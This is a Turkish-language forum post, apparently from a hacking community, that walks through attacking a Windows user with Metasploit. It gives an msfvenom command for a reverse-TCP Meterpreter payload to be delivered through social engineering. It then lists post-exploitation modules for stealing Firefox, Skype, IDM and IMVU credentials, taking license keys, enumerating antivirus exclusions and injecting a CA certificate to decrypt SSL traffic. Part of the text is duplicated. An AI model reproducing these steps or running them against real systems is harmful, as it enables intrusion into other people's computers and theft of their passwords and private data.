salam eleykum
arkadaslar ilk once onu soylemek isdiyormki ****s.ploit cok elverisli 1 proqramdir portlara brute force etme hedef sistemin ana ekran gorunr=tusun alma hedef sistemin yetkilerne sahib olmak icin kullanilan 1 aracdir bu arac icin payload karsi sisteme sizma icin 1 payload gerekir brute force haric , bu payloadlari eyer isdersenizse kalinin kendi uzerinde bulunan msfpc windows ip yazlarak ve yahudaa
evet arkadaslar zencirdeki zayif halka insandir eyer hangise sistmde insan amili varsa bir sistemin arkasinda insan duruyorsa o sistem tm guvenli diyildir. ve baska 1 sey sosial muhendislik bu asamaya gelmek icin ise bir sira tecrube ve arasdirmalar lazim mesela basdan anlatmaqa calisiyim hedefi kandirdin peki kandirdikdan sonra ne yapacaksin ? bilgi toplama bu dovrde google mukemmel 1 uyqulamadir baska baska link siteleri bulunmakdadir ve konudan uzaklasmayalum
kali linuksun uzerinde bir cok teset amacli uyqulamalar gelmisdir beef ****sploit dmitry ve baska baska amma kali linuks koruma amcali olsada onu tam ters kullanmak mumkundur
vee asagiya bir video ekleyeceyim peki videoda neler yapyorm ? ilk once olarak msfvenom ile payload yapip hedefe attim hedef payloada tikladiqinda bende otrum acildi peki otrum acildikdan sonra biz neler yapa biliriz ? asagida komutlar ve anlamlarin paylasacagim ve tam olarak kolaylik acisindan videodada modlu nasil ekleyeceyniz e yardim edecekdir
imaili calisdirir
internet download managerden sifreleri cikarir
Bu modül IMVU oyun istemcisinden hesap kullanıcı adı ve parolasını çıkarır ve onu yağma olarak saklar.
kurulu aygıtların listesini alın
Active Directory'deki tüm kullanılabilir alanları listele
arkadaslar ilk once onu soylemek isdiyormki ****s.ploit cok elverisli 1 proqramdir portlara brute force etme hedef sistemin ana ekran gorunr=tusun alma hedef sistemin yetkilerne sahib olmak icin kullanilan 1 aracdir bu arac icin payload karsi sisteme sizma icin 1 payload gerekir brute force haric , bu payloadlari eyer isdersenizse kalinin kendi uzerinde bulunan msfpc windows ip yazlarak ve yahudaa
Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(sizin ip) LPORT= (sizin acik port) -f exe > /root/Desktop
Kod:
tehlukesizlik zencirnin en zayif halkasi insandir
evet arkadaslar zencirdeki zayif halka insandir eyer hangise sistmde insan amili varsa bir sistemin arkasinda insan duruyorsa o sistem tm guvenli diyildir. ve baska 1 sey sosial muhendislik bu asamaya gelmek icin ise bir sira tecrube ve arasdirmalar lazim mesela basdan anlatmaqa calisiyim hedefi kandirdin peki kandirdikdan sonra ne yapacaksin ? bilgi toplama bu dovrde google mukemmel 1 uyqulamadir baska baska link siteleri bulunmakdadir ve konudan uzaklasmayalum
kali linuksun uzerinde bir cok teset amacli uyqulamalar gelmisdir beef ****sploit dmitry ve baska baska amma kali linuks koruma amcali olsada onu tam ters kullanmak mumkundur
Kod:
Tesir eks tesire beraberdir
Kod:
https://i.hizliresim.com/Dy9ZlO.jpg
Kod:
https://i.hizliresim.com/pG91oa.jpg
vee asagiya bir video ekleyeceyim peki videoda neler yapyorm ? ilk once olarak msfvenom ile payload yapip hedefe attim hedef payloada tikladiqinda bende otrum acildi peki otrum acildikdan sonra biz neler yapa biliriz ? asagida komutlar ve anlamlarin paylasacagim ve tam olarak kolaylik acisindan videodada modlu nasil ekleyeceyniz e yardim edecekdir
Kod:
run post/windows/gather/credentials/imail
imaili calisdirir
Kod:
run post/windows/gather/credentials/idm
internet download managerden sifreleri cikarir
Kod:
run post/windows/gather/credentials/imvu
Bu modül IMVU oyun istemcisinden hesap kullanıcı adı ve parolasını çıkarır ve onu yağma olarak saklar.
Kod:
run post/windows/gather/enum_devices
kurulu aygıtların listesini alın
Kod:
run post/windows/gather/enum_domain
Active Directory'deki tüm kullanılabilir alanları listele
Kod:
run post/multi/gather/firefox_creds
dosyanı firefox'tan çalmak için çalıştır
Kod:
run post/multi/gather/skype_enum
skypenin sifresin almaq
Kod:
post / windows / gather / enum_ms_product_keys
lisans anahtarlarını çalmak
Kod:
run post/windows/gather/enum_db
yuklu veri tabanlari
Kod:
post / windows / gather / enum_av_excluded
antivirüs istisnalarını programa götürmek geçiş ve otomatik geçiş yapmak
Kod:
post / windows / manage / inject_ca
fitcha sertifikanızı uygulamaya ve SSL trafiğini çözmek için özel ve genel bir anahtara sahip olmanızı sağlar.
ve sayr vaktim oldukca konuya ekleyeceyim insallah
cewl iyi seyirler diler
[ame="https://www.youtube.com/watch?v=4kvX_bgXuOg"]https://www.youtube.com/watch?v=4kvX_bgXuOg[/ame]
Moderatör tarafında düzenlendi: